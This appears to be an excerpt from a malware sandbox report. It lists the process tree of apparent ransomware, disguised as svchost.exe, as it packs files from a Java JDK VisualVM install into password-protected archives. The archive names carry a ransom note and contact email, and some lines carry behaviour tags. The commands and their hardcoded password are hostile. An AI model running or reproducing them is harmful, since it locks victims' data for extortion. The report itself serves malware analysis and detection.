  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2740
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2828
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2968
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-compat.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-compat.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2620
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2976
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2652
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:372
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1888
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1624
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1636
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-options.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-options.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1040
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1248
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2116
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1916
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:536
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-windows.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-windows.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1036
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1620
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-charts.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-charts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2168
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-common.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-common.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2920
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2268
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2272
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1400
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:736
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:732
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2280
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2492
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1412
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:896
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2660
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2960
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2284
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2720
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2612
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2688
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2712
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2592
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2980
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2748
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1836
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1924
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:324
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2716
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-charts.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-charts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2120
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1728
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:764
